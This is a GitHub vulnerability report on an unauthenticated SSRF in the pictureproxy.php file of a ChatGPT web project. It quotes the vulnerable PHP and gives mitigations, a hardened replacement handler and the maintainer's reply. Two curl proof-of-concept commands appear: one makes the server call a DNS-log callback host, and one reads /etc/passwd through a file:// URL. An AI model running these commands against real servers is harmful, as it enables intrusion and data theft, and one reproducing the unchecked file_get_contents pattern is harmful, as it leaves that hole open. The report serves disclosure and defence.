dirk1983/chatgpt

SSRF vulnerability in `pictureproxy.php` File

zer0yu opened this issue · 2 comments

zer0yu commented

SSRF vulnerability in pictureproxy.php File (chatgpt)

0x01 Affected version

vendor: https://github.com/dirk1983/chatgpt

version: release (commit f9f4bbc)

php version: 7.x

0x02 Vulnerability description

A Server-Side Request Forgery (SSRF) in the pictureproxy.php file of chatgpt (commit f9f4bbc) allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter. It should be noted that this vulnerability can be triggered without authentication and is therefore more harmful.

The vulnerable code is located in the pictureproxy.php file. Because the function does not perform sufficient checking on the url parameter, the taint is introduced from the $_GET['url'] variable into the sink function file_get_contents; when file_get_contents executes it sends a request to the URL specified by the url parameter, eventually leading to an SSRF vulnerability.

<?php
if (isset($_GET['url'])) {
    // user-controlled URL flows unchecked into file_get_contents (the SSRF sink);
    // any scheme PHP's stream wrappers support (http://, file://, ...) is accepted
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Because the url parameter is unrestricted, it is also possible to use the server side to send requests, such as probing web services. The corresponding PoC is as follows:

curl -i -s -k http://mm1.ltd/pictureproxy.php?url=http://hbwqkb.dnslog.cn


If open_basedir is not configured to limit the directories that the request can manipulate, it can also result in arbitrary local file reads. The corresponding PoC is as follows:

curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd

0x03 Mitigation

  1. It is recommended to change the open_basedir parameter in the php.ini configuration file to restrict the directories that can be accessed
  2. It is recommended that an authentication function be added to limit the users who can use this feature

0x04 Acknowledgement

z3
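As an added example (not code from the dirk1983/chatgpt project or from the reporter), the following is a hardened replacement for the pictureproxy.php handler quoted in the report. It keeps the same `url` query parameter but restricts the scheme to http/https (which also closes the file:// read shown above), resolves the host and rejects loopback, private and link-local targets, pins the connection to the checked IP via cURL, disables redirects, and verifies that the response body actually decodes as an image. The constants, function names and limits are assumptions chosen for illustration; an authentication check, as the report's second mitigation suggests, would go before the fetch.

```php
<?php
// Added example, not the project's code. Hardened image proxy: only public
// http(s) origins, no redirects, response must decode as an image.
declare(strict_types=1);

const ALLOWED_SCHEMES = ['http', 'https'];   // assumed policy
const MAX_IMAGE_BYTES = 5 * 1024 * 1024;     // assumed limit

/**
 * True if $ip is a public address. FILTER_FLAG_NO_PRIV_RANGE rejects RFC 1918
 * space; FILTER_FLAG_NO_RES_RANGE rejects loopback, link-local (169.254/16,
 * where cloud metadata services live), 0/8 and similar reserved ranges.
 */
function is_public_ip(string $ip): bool
{
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

/**
 * Validates a user-supplied URL. Returns the resolved public IP of its host,
 * or null if the URL must be rejected. Resolving here and pinning the
 * connection to the result (CURLOPT_RESOLVE below) prevents a DNS answer
 * changing between this check and the actual fetch.
 */
function validate_proxy_url(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    if (!in_array(strtolower($parts['scheme']), ALLOWED_SCHEMES, true)) {
        return null;                       // file://, gopher://, php://, ... rejected
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null;                       // no embedded credentials
    }
    $host = $parts['host'];
    // gethostbyname() returns the unchanged name on failure (and only handles
    // IPv4), so anything that is not an IPv4 literal afterwards is rejected.
    $ip = filter_var($host, FILTER_VALIDATE_IP) !== false ? $host : gethostbyname($host);
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    return is_public_ip($ip) ? $ip : null;
}

/**
 * Fetches $url over cURL, pinned to $pinnedIp. Returns [mime, body] or null.
 */
function fetch_image(string $url, string $pinnedIp): ?array
{
    $parts  = parse_url($url);
    $scheme = strtolower($parts['scheme']);
    $port   = $parts['port'] ?? ($scheme === 'https' ? 443 : 80);

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a redirect could point at an internal host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT        => 10,
        CURLOPT_RESOLVE        => ["{$parts['host']}:{$port}:{$pinnedIp}"],
        CURLOPT_MAXFILESIZE    => MAX_IMAGE_BYTES, // honoured only when Content-Length is sent
    ]);
    $body = curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);

    if ($body === false || $code !== 200 || strlen($body) > MAX_IMAGE_BYTES) {
        return null;
    }
    // Trust the bytes, not the upstream Content-Type header.
    $info = @getimagesizefromstring($body);
    if ($info === false || !isset($info['mime'])) {
        return null;
    }
    return [$info['mime'], $body];
}

$url = (string) ($_GET['url'] ?? '');
$ip  = validate_proxy_url($url);
if ($ip === null) {
    http_response_code(400);
    exit('Invalid request');
}
$result = fetch_image($url, $ip);
if ($result === null) {
    http_response_code(502);
    exit('Upstream fetch failed');
}
[$mime, $body] = $result;
header('Content-Type: ' . $mime);
header('X-Content-Type-Options: nosniff');
header('Content-Length: ' . (string) strlen($body));
echo $body;
```

Note that open_basedir alone only limits what file:// can read; it does nothing for the http:// request to an internal service or to the DNS-log host shown above, which is why the scheme and address checks are the essential part of this example. IPv6 literal hosts are rejected as a side effect of using gethostbyname(); an IPv6-capable deployment would need dns_get_record() with the same public-range filter applied to AAAA answers.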

Thanks for your kind reminder.

I only saw this message a couple of days ago. Inner monologue: people just share this to use with a few friends, and even that gets a vulnerability report filed; big brother, you really are hungry (manual doge emoji).